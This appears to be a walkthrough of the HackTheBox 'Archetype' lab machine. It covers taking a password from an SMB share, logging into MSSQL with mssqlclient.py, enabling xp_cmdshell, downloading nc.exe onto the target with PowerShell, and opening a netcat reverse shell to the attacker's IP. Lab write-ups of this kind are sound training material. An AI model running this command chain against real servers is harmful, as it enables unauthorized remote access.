Archetype Walkthrough | HackTheBox
This is a simple walkthrough for completing the Archetype target machine in Hackthebox.com.
Question: Which TCP port is hosting a database server?
Question: What is the name of the non-Administrative share available over SMB?
Question: What is the password identified in the file on the SMB share?
To get this password, you can navigate to the backups share and inside of there you will see a file named prod.dtsConfig. To download this file, use the smblient get command.
Question: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
Question: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
Question: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
Question: What file contains the administrator’s password?
We can use the tool mssqlclient.py tool along with the username and password we found in task 3 to login to the server.
- mssqlclient.py: An MSSQL client, supporting SQL and Windows Authentications (hashes too). It also supports TLS.
We can use the -help command to get the additional commands.
The command that we want to run here is enable_xp_cmdshell. We want to show proof of concept. Ideally, we want to see if the system will let us run arbitrary commands to provide us with any additional pivot points.
As you can see from the screenshot above, the command xp_cmdshell “whoami” executed and returned the value.
Since we now know that the server allows us to run arbitrary commands, we can try and use netcat to create a reverse shell. A reverse shell is a remote shell, where the connection is made from the system that offers the services to the client that wants to use these services.
To start this process, we need to transfer the netcat executable to the server in order to create the connection back to our machine. First, make sure you have the netcat tool readily available in exe format in your home folder. Next, we need to start a quick http server using python to host this file.
$ python3 -m http.server 80
As well as the nc listener in another terminal
$ nc -lvnp 443
Once we are ready on our end, we will have to look for a location on the server to drop the file but it has to have the proper permissions to allow us to execute the file. The folder with executable permissions on the sever is the downloads folder. We will be running powershell using xp_cmdshell to run our command to retrieve the file.
$ xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http:<YOUR IP ADDRESS>/nc.exe -outputfile nc.exe
The above code states “nc64.exe” but this would be the name of the netcat file you have.
With the http server on our machine hosting the file and the sql server using wget to retrieve the file, we can now proceed with establishing a reverse shell.
$ xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe 10.10.14.75 443